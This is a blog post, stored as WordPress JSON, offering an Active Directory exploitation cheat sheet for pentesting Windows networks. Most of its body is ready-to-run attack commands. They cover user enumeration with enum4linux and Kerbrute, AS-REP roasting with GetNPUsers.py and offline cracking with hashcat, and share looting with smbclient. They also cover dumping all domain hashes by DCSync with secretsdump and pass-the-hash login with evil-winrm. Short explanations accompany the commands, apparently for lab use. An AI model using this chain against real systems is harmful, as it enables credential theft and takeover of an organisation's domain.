{"id":2630,"date":"2021-12-31T18:53:47","date_gmt":"2021-12-31T18:53:47","guid":{"rendered":"https:\/\/dft.wiki\/?p=2630"},"modified":"2022-01-01T17:08:35","modified_gmt":"2022-01-01T17:08:35","slug":"active-directory-exploitation-cheat-sheet","status":"publish","type":"post","link":"https:\/\/dft.wiki\/?p=2630","title":{"rendered":"Active Directory Exploitation Cheat Sheet"},"content":{"rendered":"<p>While pentesting a Windows network, some tools are essential to have handy:<\/p>\n<ul>\n<li>Enum4Linux &#8211; Quick enumeration of users, groups and shares.<\/li>\n<li>Kerbrute &#8211; Enumerate valid domain users without locking them out.<\/li>\n<li>Impacket &#8211; Python classes and example scripts for SMB, NetBIOS, Kerberos and other Windows protocols.\n<ul>\n<li>ASREPRoasting attack &#8211; Requesting crackable AS-REP hashes for accounts that do not require Kerberos pre-authentication.\n<ul>\n<li>HashCat &#8211; Cracking those Kerberos hashes offline.<\/li>\n<\/ul>\n<\/li>\n<li>secretsdump &#8211; Dumping the NTDS.DIT hashes.<\/li>\n<\/ul>\n<\/li>\n<li>Evil-WinRM &#8211; Logging in by passing a dumped hash (no password needed).<\/li>\n<li>SMBclient &#8211; Enumerating and reading shares.<\/li>\n<\/ul>\n<hr \/>\n<p>Quick enumeration of users, groups, shares&#8230; with <strong>Enum4Linux<\/strong> [<a href=\"https:\/\/gitlab.com\/kalilinux\/packages\/enum4linux\">Link<\/a>]; the nmap scripts give a second opinion over SMB on port 445:<\/p>\n<pre>\/usr\/share\/enum4linux\/enum4linux.pl -a <strong>10.10.10.10<\/strong>\r\nnmap -p <strong>445<\/strong> --script=smb-enum-shares.nse,smb-enum-users.nse <strong>10.10.10.10<\/strong><\/pre>\n<hr \/>\n<p><strong>Kerbrute<\/strong> &#8211; Brute forces and <strong>enumerates<\/strong> valid Active Directory <strong>accounts<\/strong> through Kerberos Pre-Authentication [<a href=\"https:\/\/github.com\/ropnop\/kerbrute\/releases\">Link<\/a>]. It sends an AS-REQ without pre-authentication data for each candidate name: the KDC answers KDC_ERR_C_PRINCIPAL_UNKNOWN for a non-existent user and KDC_ERR_PREAUTH_REQUIRED (or a TGT, if pre-auth is disabled) for a real one. These are not failed logons, so they do not count towards account lockout, but each one is logged on the DC as a Kerberos TGT request (event ID 4768).<\/p>\n<p>There is also a small helper repository that bundles a ready-made binary, which I recommend using; the valid names it reports are the user list for the ASREPRoasting step:<\/p>\n<pre>git clone https:\/\/github.com\/Sq00ky\/attacktive-directory-tools.git\r\ncd attacktive-directory-tools &amp;&amp; chmod +x kerbrute\r\n.\/kerbrute userenum --dc <strong>10.10.10.10<\/strong> -d <strong>domain.local user.lst<\/strong><\/pre>\n<hr \/>\n<p>Installing 
<strong>Impacket<\/strong> &#8211; A collection of Python classes for working with network protocols, from raw packet crafting up to full SMB, MSRPC, Kerberos and LDAP implementations, plus the example scripts used below:<\/p>\n<pre>sudo git clone https:\/\/github.com\/SecureAuthCorp\/impacket.git \/opt\/impacket\r\nsudo pip3 install -r \/opt\/impacket\/requirements.txt\r\ncd \/opt\/impacket\/\r\nsudo python3 .\/setup.py install<\/pre>\n<hr \/>\n<p><strong>ASREPRoasting<\/strong> attack using <strong>Impacket<\/strong> &#8211; Targets accounts with <strong>Do not require Kerberos preauthentication<\/strong> set: the KDC hands out an AS-REP for them to anyone who asks, and the encrypted part of that reply is keyed from the user's password, so it can be cracked offline. Without valid credentials the script can only try the names you give it (a single user as below, or a list via -usersfile, e.g. Kerbrute's output); with valid domain credentials it enumerates the affected accounts over LDAP:<\/p>\n<pre>python3 \/opt\/impacket\/examples\/GetNPUsers.py <strong>domain.local\/admin<\/strong> -request -no-pass -dc-ip <strong>10.10.10.10<\/strong><\/pre>\n<p><strong>Cracking Kerberos hashes<\/strong> obtained from the ASREPRoasting attack &#8211; Save the $krb5asrep$23$... lines to a file first; mode 18200 is Kerberos 5 AS-REP etype 23 (RC4-HMAC), the type GetNPUsers.py requests by default:<\/p>\n<pre>hashcat --force -m 18200 -a 0 <strong>svc-admin.hash<\/strong> \/usr\/share\/wordlists\/rockyou.txt<\/pre>\n<hr \/>\n<p><strong>Enumerating shares<\/strong> for a particular user &#8211; Knowing the password is required! The first command lists the shares, the second opens an interactive session in which <strong>get<\/strong> downloads a file, and smbget mirrors a whole share recursively:<\/p>\n<pre>smbclient -U <strong>domain.local\/admin<\/strong> -L \/\/<strong>10.10.10.10<\/strong>\r\nsmbclient -U <strong>domain.local\/admin<\/strong> \/\/<strong>10.10.10.10\/share<\/strong>\r\nget <strong>file.txt<\/strong>\r\nsmbget -U <strong>domain.local\/admin<\/strong> -R smb:\/\/<strong>10.10.10.10\/share<\/strong><\/pre>\n<hr \/>\n<p><strong>Dumping<\/strong> all NTDS.DIT <strong>hashes<\/strong> with <strong>Impacket<\/strong> &#8211; This uses the DRSUAPI replication protocol (DCSync) rather than copying the file, so the account needs replication rights, typically Domain Admin; add -just-dc-ntlm to get only the NTLM hashes:<\/p>\n<pre>python3 \/opt\/impacket\/examples\/secretsdump.py -dc-ip <strong>10.10.10.10<\/strong> <strong>domain.local\/admin:password@10.10.10.10<\/strong><\/pre>\n<hr \/>\n<p>Authenticating by <strong>passing a dumped hash<\/strong> (no password required) using <strong>Evil-WinRM<\/strong> &#8211; -H takes the NT hash alone, i.e. the fourth field of a secretsdump line (user:rid:lmhash:nthash:::), and the account must be allowed to use WinRM (TCP 5985), i.e. be a local administrator or a member of Remote Management Users:<\/p>\n<pre>sudo gem install evil-winrm\r\nevil-winrm -i <strong>10.10.10.10<\/strong> -u <strong>administrator<\/strong> -H <strong>5f4dcc3b5aa765d61d8327deb882cf99<\/strong><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>While pentesting a Windows network, some tools are 
essential to have handy: Enum4Linux &#8211; Quick [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-2630","post","type-post","status-publish","format-standard","hentry","category-hacking"],"_links":{"self":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/2630","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2630"}],"version-history":[{"count":5,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/2630\/revisions"}],"predecessor-version":[{"id":2637,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/2630\/revisions\/2637"}],"wp:attachment":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2630"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2630"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2630"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}